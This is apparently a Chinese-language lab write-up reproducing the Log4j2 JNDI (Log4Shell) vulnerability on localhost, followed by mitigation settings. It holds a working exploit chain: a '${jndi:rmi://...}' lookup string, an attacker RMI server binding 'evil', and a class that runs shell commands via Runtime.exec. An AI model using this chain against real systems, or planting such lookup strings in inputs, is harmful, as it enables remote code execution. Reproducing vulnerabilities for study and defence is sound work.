Log4j2 JNDI漏洞复现测试

一、系统环境

组件	版本
Ubuntu	20.04

二、简要说明

1、jar包说明

名称	作用
hacker-0.0.1-SNAPSHOT.jar	攻击者
target-0.0.1-SNAPSHOT.jar	攻击目标

2、攻击说明

（1）hacker启动一个RMI服务，端口号1099，绑定了evil路径，返回“com.example.target.service.HackerTest”的依赖。
（2）target记录一条日志，内容为“${jndi:rmi://localhost:1099/evil}”
（3）target的log4j将内容解析为，需要一个远程依赖localhost:1099/evil
（4）target访问hacker，获取需要加载执行com.example.target.service.HackerTest类
（5）target执行HackerTest，在用户根目录下创建了一个flaw-log4j2文件夹

3、模拟实践

（1）将hacker-0.0.1-SNAPSHOT.jar、target-0.0.1-SNAPSHOT.jar 拷贝到linux服务器上
（2）启动hacker

java -jar hacker-0.0.1-SNAPSHOT.jar

（3）启动target

java -jar target-0.0.1-SNAPSHOT.jar

（4）检查用户根目录下是否创建了flaw-log4j2文件夹

4、防御模拟

（1）JVM参数方式

java -Dlog4j2.formatMsgNoLookups=true -jar target-0.0.1-SNAPSHOT.jar

（2）环境变量方式

sudo vim /etc/profile

添加

# 环境变量 针对log4j 2.10以下版本
export FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS = true
# 环境变量 针对log4j 2.10以上版本
export LOG4J_FORMAT_MSG_NO_LOOKUPS = true

刷新环境变量

source /etc/profile

模拟攻击

java -jar target-0.0.1-SNAPSHOT.jar

（3）JDK方式
JNDI注入，即某代码中存在JDNI的string可控的情况，可构造恶意RMI或者LDAP服务端，导致远程任意类被加载，造成任意代码执行。
JNDI注入中RMI和LDAP与JDK版本的关系，参考这张图：

三、攻击目标target

1、pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>2.6.1</version>
		<relativePath/> <!-- lookup parent from repository -->
	</parent>
	<groupId>com.example</groupId>
	<artifactId>target</artifactId>
	<version>0.0.1-SNAPSHOT</version>
	<name>target</name>
	<description>Demo project for Spring Boot</description>
	<properties>
		<java.version>1.8</java.version>
	</properties>
	<dependencies>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter</artifactId>
			<exclusions>
				<exclusion>
					<groupId>org.springframework.boot</groupId>
					<artifactId>spring-boot-starter-logging</artifactId>
				</exclusion>
			</exclusions>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-log4j2</artifactId>
		</dependency>

		<dependency>
			<groupId>org.projectlombok</groupId>
			<artifactId>lombok</artifactId>
			<optional>true</optional>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-test</artifactId>
			<scope>test</scope>
		</dependency>
	</dependencies>

	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
				<configuration>
					<excludes>
						<exclude>
							<groupId>org.projectlombok</groupId>
							<artifactId>lombok</artifactId>
						</exclude>
					</excludes>
				</configuration>
			</plugin>
		</plugins>
	</build>
</project>

2、TargetApplication

package com.example.target;

import lombok.extern.slf4j.Slf4j;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@Slf4j
@SpringBootApplication
public class TargetApplication {

	public static void main(String[] args) {
		String username = "${jndi:rmi://localhost:1099/evil}";
//        username = "${java:os}";
//        username = "${java:runtime}";
		log.info("Hello,{}!",username);
		SpringApplication.run(TargetApplication.class, args);
	}
}

3、HackerTest

package com.example.target.service;

import java.io.IOException;

public class HackerTest {
    static {
        System.out.println("log4j2 被JNDI攻击了");
        try {
            //Mac
            //Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
            //Runtime.getRuntime().exec("/usr/bin/touch /Users/yaingyi/Desktop/a.md");

            //Linux
            Runtime.getRuntime().exec(new String[]{"bash", "-c","mkdir ~/flaw-log4j2"});

        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

3、log4j2.xml

<?xml version="1.0" encoding="UTF-8"?>
<!--该日志可默认项目使用: 每日生成一个日志文件，200M最大-->
<configuration status="WARN" monitorInterval="1800">
    <Properties>
        <property name="appName">agamotto-provider</property>
        <!--    <property name="basePath">../logs</property>-->
        <property name="basePath">./logs</property>

        <!-- 控制台默认输出格式,"%-5level":日志级别,"%l":输出完整的错误位置,是小写的L,因为有行号显示,所以影响日志输出的性能 -->
        <property name="console_log_pattern">%d{yyyy-MM-dd HH:mm:ss.SSS} [%-5level] %l - %m%n</property>
        <!-- 日志文件默认输出格式,不带行号输出(行号显示会影响日志输出性能);%C:大写,类名;%M:方法名;%m:错误信息;%n:换行 -->
        <property name="file_log_pattern">%d{yyyy-MM-dd HH:mm:ss.SSS} [%-5level] %C.%M - %m%n</property>
        <!-- 日志默认压缩路径,将超过指定文件大小的日志,自动存入按"年月"建立的文件夹下面并进行压缩,作为存档 -->
        <property name="rolling_filePattern">${basePath}/${appName}-%d{yyyy-MM-dd}-%i.log</property>
    </Properties>

    <!--定义appender -->
    <appenders>
        <!-- =======================================用来定义输出到控制台的配置======================================= -->
        <Console name="Console" target="SYSTEM_OUT">
            <!-- 设置控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch)-->
            <ThresholdFilter level="info" onMatch="ACCEPT" onMismatch="DENY"/>
            <!-- 设置输出格式,不设置默认为:%m%n -->
            <PatternLayout pattern="${console_log_pattern}"/>
        </Console>
        <!-- ================================打印root中指定的level级别以上的日志到文件================================ -->
        <RollingFile name="RollingFile" fileName="${basePath}/${appName}.log" filePattern="${rolling_filePattern}">
            <PatternLayout pattern="${file_log_pattern}"/>
            <Policies>
                <!--        单位是filePattern的最小时间单位-->
                <TimeBasedTriggeringPolicy interval="1" modulate="true"/>
                <!--        这个限制对当前文件和已经历史文件都有效-->
                <SizeBasedTriggeringPolicy size="200MB"/>
            </Policies>
            <!-- 日志默认同类型日志,同一文件夹下可以存放的数量,不设置此属性则默认为7个,filePattern最后要带%i才会生效 -->
            <DefaultRolloverStrategy max="5"/>
        </RollingFile>
    </appenders>

    <!--定义logger,只有定义了logger并引入的appender,appender才会生效-->
    <loggers>
        <!-- 设置打印sql语句配置开始,以下两者配合使用,可以优化日志的输出信息,减少一些不必要信息的输出 -->
        <!-- 设置java.sql包下的日志只打印DEBUG及以上级别的日志,此设置可以支持sql语句的日志打印 -->
        <logger name="java.sql" level="DEBUG" additivity="false">
            <appender-ref ref="Console"/>
        </logger>
        <!-- 设置org.mybatis.spring包下的日志只打印WARN及以上级别的日志 -->
        <logger name="org.mybatis.spring" level="WARN" additivity="false">
            <appender-ref ref="Console"/>
        </logger>
        <!-- 设置org.mybatis.spring包下的日志只打印WARN及以上级别的日志 -->
        <logger name="org.springframework" level="WARN" additivity="false">
            <appender-ref ref="Console"/>
        </logger>
        <!-- 设置org.mybatis.spring包下的日志只打印WARN及以上级别的日志 -->
        <logger name="com.qfx.workflow.service" level="WARN" additivity="false">
            <appender-ref ref="Console"/>
        </logger>
        <!-- 设置打印sql语句配置结束 -->

        <!--建立一个默认的root的logger-->
        <root level="info">
            <appender-ref ref="RollingFile"/>
            <appender-ref ref="Console"/>
        </root>
    </loggers>

</configuration>

四、攻击者hacker

1、pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.6.1</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>hacker</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>hacker</name>
    <description>Demo project for Spring Boot</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>


        <dependency>
            <groupId>org.projectlombok</groupId>
            <artifactId>lombok</artifactId>
            <optional>true</optional>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

2、HackerApplicaion

package com.example.hacker;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

@SpringBootApplication
public class HackerApplication {

    public static void main(String[] args) {
        SpringApplication.run(HackerApplication.class, args);
        try{
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();

            System.out.println("Create RMI registry on port 1099");
            Reference reference = new Reference("com.example.target.service.HackerTest","com.example.target.service.HackerTest",null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("evil",referenceWrapper);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

五、参考鸣谢

《JDK 8u191之后的JNDI注入(LDAP)》学习